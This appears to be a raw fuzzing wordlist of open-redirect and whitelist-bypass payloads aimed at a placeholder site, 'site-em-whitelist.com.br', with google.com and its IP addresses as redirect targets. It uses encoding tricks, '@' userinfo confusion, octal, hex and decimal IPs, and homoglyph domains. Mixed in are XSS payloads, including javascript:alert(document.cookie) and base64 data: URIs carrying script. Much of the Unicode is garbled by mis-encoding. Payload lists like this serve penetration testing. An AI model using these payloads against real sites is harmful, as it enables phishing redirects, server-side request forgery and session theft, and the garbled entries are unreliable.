//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@site-em-whitelist.com.br/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@site-em-whitelist.com.br
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\tsite-em-whitelist.com.br/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%00ï½¡ï¼°â“¦
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%E3%80%82pw
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23@site-em-whitelist.com.br
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%FF@site-em-whitelist.com.br
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/site-em-whitelist.com.br
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@site-em-whitelist.com.br/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@site-em-whitelist.com.br/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦?
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@.site-em-whitelist.com.br
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@site-em-whitelist.com.br
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\\@.site-em-whitelist.com.br
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\tsite-em-whitelist.com.br/
//ï¹”@google.com
//ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/142.251.129.35
/3627734734
/<>//google.com
/<>//site-em-whitelist.com.br
/?url=//site-em-whitelist.com.br&next=//site-em-whitelist.com.br&redirect=//site-em-whitelist.com.br&redir=//site-em-whitelist.com.br&rurl=//site-em-whitelist.com.br&redirect_uri=//site-em-whitelist.com.br
/?url=/\/site-em-whitelist.com.br&next=/\/site-em-whitelist.com.br&redirect=/\/site-em-whitelist.com.br&redirect_uri=/\/site-em-whitelist.com.br
/?url=Https://site-em-whitelist.com.br&next=Https://site-em-whitelist.com.br&redirect=Https://site-em-whitelist.com.br&redir=Https://site-em-whitelist.com.br&rurl=Https://site-em-whitelist.com.br&redirect_uri=Https://site-em-whitelist.com.br
/ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org
/\/\/google.com/
/\/\/site-em-whitelist.com.br/
/\/\google.com
/\/google.com
/\/google.com/
/\/site-em-whitelist.com.br/
/\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/\142.251.129.35
/\3627734734
/\google%252ecom
/\google.com
/\site-em-whitelist.com.br:80%40google.com
/google.com
/google.com/%2F..
/google.com/%2F..
/google.com/%2e%2e
/google.com/%2f%2e%2e
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://google.com
/http://site-em-whitelist.com.br
/http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/http:/google.com
/http:/site-em-whitelist.com.br
/http:/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/http:/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https:/%5cgoogle.com/
/https:/%5csite-em-whitelist.com.br/
/https:/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https:/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://%09/google.com
/https://%09/site-em-whitelist.com.br
/https://%5cgoogle.com
/https://%5csite-em-whitelist.com.br
/https://%5csite-em-whitelist.com.br@google.com
/https://%5csite-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://%5csite-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://%5câ“ğ¨ğ—°ï¿½ğ•   â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https:///google.com/%2f%2e%2e
/https:///site-em-whitelist.com.br/%2e%2e
/https:///site-em-whitelist.com.br/%2f%2e%2e
/https:///site-em-whitelist.com.br@google.com/%2f%2e%2e
/https:///site-em-whitelist.com.br@www.google.com/%2f%2e%2e
/https:///site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https:///site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https:///www.google.com/%2f%2e%2e
/https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://google.com
/https://google.com/
/https://google.com/%2e%2e
/https://google.com/%2f%2e%2e
/https://google.com/%2f..
/https://google.com//
/https://site-em-whitelist.com.br
/https://site-em-whitelist.com.br/
/https://site-em-whitelist.com.br/%2e%2e
/https://site-em-whitelist.com.br/%2e%2e%2f
/https://site-em-whitelist.com.br/%2f%2e%2e
/https://site-em-whitelist.com.br/%2f..
/https://site-em-whitelist.com.br//
/https://site-em-whitelist.com.br@google.com/
/https://site-em-whitelist.com.br@google.com/%2e%2e
/https://site-em-whitelist.com.br@google.com/%2f%2e%2e
/https://site-em-whitelist.com.br@google.com/%2f..
/https://site-em-whitelist.com.br@google.com/%2f.//site-em-whitelist.com.br@google.com/%2f..
/https://site-em-whitelist.com.br@www.google.com/%2e%2e
/https://site-em-whitelist.com.br@www.google.com/%2f%2e%2e
/https://site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https://site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https://www.google.com/%2e%2e
/https://www.google.com/%2f%2e%2e
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https:google.com
/https:site-em-whitelist.com.br
/javascript:alert(1)
/javascript:alert(1);
/redirect?url=//site-em-whitelist.com.br&next=//site-em-whitelist.com.br&redirect=//site-em-whitelist.com.br&redir=//site-em-whitelist.com.br&rurl=//site-em-whitelist.com.br&redirect_uri=//site-em-whitelist.com.br
/redirect?url=/\/site-em-whitelist.com.br&next=/\/site-em-whitelist.com.br&redirect=/\/site-em-whitelist.com.br&redir=/\/site-em-whitelist.com.br&rurl=/\/site-em-whitelist.com.br&redirect_uri=/\/site-em-whitelist.com.br
/redirect?url=Https://site-em-whitelist.com.br&next=Https://site-em-whitelist.com.br&redirect=Https://site-em-whitelist.com.br&redir=Https://site-em-whitelist.com.br&rurl=Https://site-em-whitelist.com.br&redirect_uri=Https://site-em-whitelist.com.br
/site-em-whitelist.com.br/%2f%2e%2e
/x:1/:///%01javascript:alert(document.cookie)/
/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/ã€±google.com
/ã€±â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã€±â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã€µgoogle.com
/ã€µâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã‚google.com
/ã‚â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ãƒ¼google.com
/ãƒ¼â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ï½°google.com
/ï½°â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
142.251.129.35
172.217.167.46
3627734734
<>//google.com
<>//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
<>//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
<>javascript:alert(1);
@google.com
@https://www.google.com
@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
HTTP://google.com
HtTP://google.com
HtTPs://google.com
Javas%26%2399;ript:alert(1)
Javascript://%E2%80%A9alert(618)
\/\/google.com/
\/\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
\/\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
\152\141\166\141\163\143\162\151\160\164\072alert(1)
\\google.com
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\x20http://google.com
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
data:site-em-whitelist.com.br;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
google%252ecom
google.com
google.com%23@site-em-whitelist.com.br
google.com/.jpg
google.com/site-em-whitelist.com.br
hTTp://google.com
hthttp://tp://google.com
http%3A%2F%2Fwww.google.com
http:%0a%0dgoogle.com
http:%0a%0dâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:%0a%0dâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://.google.com
http://.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:///////////google.com
http://00330.00072.0000326.00000316
http://00330.0x3a.54990
http://00330.3856078
http://0330.072.0326.0316
http://0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http://0xd83ad6ce
http://3627734734
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@472.314.470.462
http://3H6k7lIAiqjfNeN@[::142.251.129.35]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:142.251.129.35]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@site-em-whitelist.com.br+@google.com/
http://3H6k7lIAiqjfNeN@site-em-whitelist.com.br+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@site-em-whitelist.com.br+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@site-em-whitelist.com.br@google.com/
http://3H6k7lIAiqjfNeN@site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@site-em-whitelist.com.brâº@google.com/
http://3H6k7lIAiqjfNeN@site-em-whitelist.com.brâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://472.314.470.462
http://;@google.com
http://;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@472.314.470.462
http://XY>.7d8T\205pZM@[::142.251.129.35]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:142.251.129.35]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@site-em-whitelist.com.br+@google.com/
http://XY>.7d8T\205pZM@site-em-whitelist.com.br+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@site-em-whitelist.com.br+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@site-em-whitelist.com.br@google.com/
http://XY>.7d8T\205pZM@site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@site-em-whitelist.com.brâº@google.com/
http://XY>.7d8T\205pZM@site-em-whitelist.com.brâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://[::142.251.129.35]
http://[::216.58.214.206]
http://[::ffff:142.251.129.35]
http://[::ffff:216.58.214.206]
http://google.com
http://google.com%23.site-em-whitelist.com.br/
http://google.com%2f%2f.site-em-whitelist.com.br/
http://google.com%3F.site-em-whitelist.com.br/
http://google.com%5c%5c.site-em-whitelist.com.br/
http://google.com&site-em-whitelist.com.br
http://google.com:80#@site-em-whitelist.com.br/
http://google.com:80?@site-em-whitelist.com.br/
http://google.com\site-em-whitelist.com.br
http://google.com\tsite-em-whitelist.com.br/
http://site-em-whitelist.com.br%2egoogle.com/
http://site-em-whitelist.com.br%2eâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://site-em-whitelist.com.br%2eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://site-em-whitelist.com.br+&@google.com#+@site-em-whitelist.com.br/
http://site-em-whitelist.com.br+&@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@site-em-whitelist.com.br/
http://site-em-whitelist.com.br+&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@site-em-whitelist.com.br/
http://site-em-whitelist.com.br.google.com
http://site-em-whitelist.com.br:80%40google.com/
http://site-em-whitelist.com.br:80%40â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://site-em-whitelist.com.br:80%40â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://site-em-whitelist.com.br@00330.00072.0000326.00000316
http://site-em-whitelist.com.br@00330.0x3a.54990
http://site-em-whitelist.com.br@00330.3856078
http://site-em-whitelist.com.br@0330.072.0326.0316
http://site-em-whitelist.com.br@0xd8.072.54990
http://site-em-whitelist.com.br@0xd8.0x3a.0xd6.0xce
http://site-em-whitelist.com.br@0xd8.3856078
http://site-em-whitelist.com.br@0xd83ad6ce
http://site-em-whitelist.com.br@3627734734
http://site-em-whitelist.com.br@472.314.470.462
http://site-em-whitelist.com.br@[::142.251.129.35]
http://site-em-whitelist.com.br@[::216.58.214.206]
http://site-em-whitelist.com.br@[::ffff:142.251.129.35]
http://site-em-whitelist.com.br@[::ffff:216.58.214.206]
http://site-em-whitelist.com.br@google.com/
http://site-em-whitelist.com.brâº&@google.com#âº@site-em-whitelist.com.br/
http://site-em-whitelist.com.brâº&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#âº@site-em-whitelist.com.br/
http://www.google.com
http://www.google.com\.site-em-whitelist.com.br
http://www.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.site-em-whitelist.com.br
http://www.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.site-em-whitelist.com.br
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23.site-em-whitelist.com.br/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.site-em-whitelist.com.br/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%3F.site-em-whitelist.com.br/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%5c%5c.site-em-whitelist.com.br/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@site-em-whitelist.com.br/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@site-em-whitelist.com.br/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\tsite-em-whitelist.com.br/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23.site-em-whitelist.com.br/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.site-em-whitelist.com.br/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%3F.site-em-whitelist.com.br/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%5c%5c.     site-em-whitelist.com.br/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@site-em-whitelist.com.br/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@site-em-whitelist.com.br/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\tsite-em-whitelist.com.br/
http://ï¹”@google.com
http://ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:/\/\google.com
http:/google.com
http:/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:00330.00072.0000326.00000316
http:00330.0x3a.54990
http:00330.3856078
http:0330.072.0326.0316
http:0xd8.072.54990
http:0xd8.0x3a.0xd6.0xce
http:0xd8.3856078
http:0xd83ad6ce
http:3627734734
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@472.314.470.462
http:3H6k7lIAiqjfNeN@[::142.251.129.35]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:142.251.129.35]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:472.314.470.462
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@472.314.470.462
http:XY>.7d8T\205pZM@[::142.251.129.35]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:142.251.129.35]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:[::142.251.129.35]
http:[::216.58.214.206]
http:[::ffff:142.251.129.35]
http:[::ffff:216.58.214.206]
http:google.com
http:site-em-whitelist.com.br@00330.00072.0000326.00000316
http:site-em-whitelist.com.br@00330.0x3a.54990
http:site-em-whitelist.com.br@00330.3856078
http:site-em-whitelist.com.br@0330.072.0326.0316
http:site-em-whitelist.com.br@0xd8.072.54990
http:site-em-whitelist.com.br@0xd8.0x3a.0xd6.0xce
http:site-em-whitelist.com.br@0xd8.3856078
http:site-em-whitelist.com.br@0xd83ad6ce
http:site-em-whitelist.com.br@3627734734
http:site-em-whitelist.com.br@472.314.470.462
http:site-em-whitelist.com.br@[::142.251.129.35]
http:site-em-whitelist.com.br@[::216.58.214.206]
http:site-em-whitelist.com.br@[::ffff:142.251.129.35]
http:site-em-whitelist.com.br@[::ffff:216.58.214.206]
http:â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http\x3A\x2F\x2Fgoogle.com
https%3A%2F%2Fwww.google.com
https%3A/:@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@site-em-whitelist.com.br
https%3A/;@google.com
https%3A/google.com
https%3A/www.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.site-em-whitelist.com.br
https%3A/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.site-em-whitelist.com.br/
https%3A/ï¹”@google.com
https%3a%2f%2fgoogle.com%2f
https:/%5cgoogle.com/
https:/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https:/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://%09/google.com
https://%09/site-em-whitelist.com.br@google.com
https://%09/site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%0a%0dgoogle.com
